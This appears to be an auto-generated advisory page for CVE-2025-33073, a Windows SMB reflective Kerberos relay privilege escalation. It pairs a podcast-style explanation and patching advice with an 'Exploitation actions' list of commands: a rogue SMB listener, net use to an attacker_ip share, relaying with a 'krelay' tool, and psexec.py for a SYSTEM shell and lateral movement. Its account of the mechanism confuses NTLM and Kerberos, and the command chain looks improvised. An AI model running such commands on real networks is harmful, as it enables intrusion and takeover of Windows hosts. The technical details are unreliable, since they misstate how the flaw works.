Windows SMB client: Improper access control in Windows SMB allowing privilege escalation via Reflective Kerberos Relay (CVE-2025-33073) #shorts
Summary
Hello and welcome to this podcast. Today we’re talking about CVE-2025-33073, a serious privilege-escalation vulnerability in Windows Server Message Block (SMB). Publicly disclosed by Microsoft on June 10, 2025, this issue could allow an authenticated attacker on the network to elevate to SYSTEM privileges via a reflective Kerberos relay attack. We’ll break down what it is, which products are affected, how it works, and how you can protect your systems.
Product details
CVE-2025-33073 affects a broad range of Windows operating systems and install options. All builds of Windows 10 (from Version 1507 up through 24H2), Windows 11 (22H2, 22H3, 23H2, 24H2), Windows Server 2008 SP2 (including Server Core), Server 2008 R2 SP1, Server 2012/R2, Server 2016, Server 2019 (and Server Core), Server 2022 (and 23H2 Core), and the new Windows Server 2025 (and its Core installation) are impacted if they have not been updated to the June 2025 security releases.
Vulnerability type summary
This vulnerability stems from improper access control (CWE-284) in the Windows SMB client implementation. An attacker with valid credentials can perform a reflective Kerberos relay using NTLM tokens over SMB, tricking the system into issuing higher-privileged tickets. This bypasses intended Kerberos safeguards and leads to SYSTEM-level execution.
Details of the vulnerability
Here’s how it works: 1. The attacker must first authenticate to an SMB share using normal credentials (for example, a low-privilege domain user). 2. The malicious SMB server then reflects the attacker’s NTLM authentication back at the client, triggering a Kerberos service ticket request for the attacker’s own identity. 3. Because of a flaw in how Windows caches and validates those tokens, the client unwittingly accepts a ticket with elevated privileges and presents it to itself. 4. The attacker uses this elevated ticket to run code as SYSTEM on the target machine. This attack can be launched from a compromised host inside the network or via a malicious SMB endpoint. It requires no user interaction beyond supplying valid credentials and exploits the way Windows handles reflected Kerberos authentication over SMB.
Conclusion
CVE-2025-33073 represents a powerful means for lateral movement and privilege escalation in Windows environments. To mitigate the risk: • Apply Microsoft’s June 2025 cumulative updates immediately on all affected systems. • Restrict SMB exposure to untrusted networks; enforce SMB signing and encryption where possible. • Monitor for unusual Kerberos ticket requests and NTLM relay behavior. • Follow the principle of least privilege and rotate service account credentials. That wraps up our deep-dive on CVE-2025-33073. Stay patched, stay vigilant, and thanks for listening.
Watch the full video on YouTube: CVE-2025-33073
Remediation and exploitation details
This chain involves the following actors
- Attacker: Authorized domain user leveraging network access
- Security Administrator: Responsible for system patching and hardening
This following systems are involved
- Windows SMB Client (Network file and printer sharing): Initiates server message block authentication requests
- Kerberos Relay Framework (Intercepts and relays authentication tokens): Exploitation tool for privilege escalation
- Domain Controller (Issues Kerberos tickets): Central authentication authority
Attack entry point
- Malicious SMB Server: Rogue server that captures Kerberos authentication from the client
Remediation actions
Exploitation actions
Set up a listener for inbound SMB connections on port 445
- krelay --listen 0.0.0.0:445 --target cifs/host
Trick a user or machine to connect to the malicious server via a network share path
- net use \\attacker_ip\share /user:domain\\user password
Intercept the authentication request message from the client
- krelay --capture
Forward the captured request to a privileged service endpoint on the local network
- krelay --relay-to cifs/target_host
Use the relayed token to request a service ticket and bind to the service as the system account
- rpcclient -U ''%ticket%'' target_host -c '!'
Spawn a system privileged shell and move laterally across the network
- psexec.py target_host -hashes : -no-pass cmd.exe
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073
- [2025-06-11] An in-depth analysis of the NTLM reflection vulnerability CVE-2025-33073.
- [2025-06-12] A new Windows SMB vulnerability, CVE-2025-33073, allows privilege escalation via a Reflective Kerberos Relay Attack.
- [2025-06-11] An article discussing the CVE-2025-33073 Kerberos Relay Attack and its implications.
- [2025-06-11] A new zero-day vulnerability in Windows SMB Client allows attackers to gain SYSTEM privileges.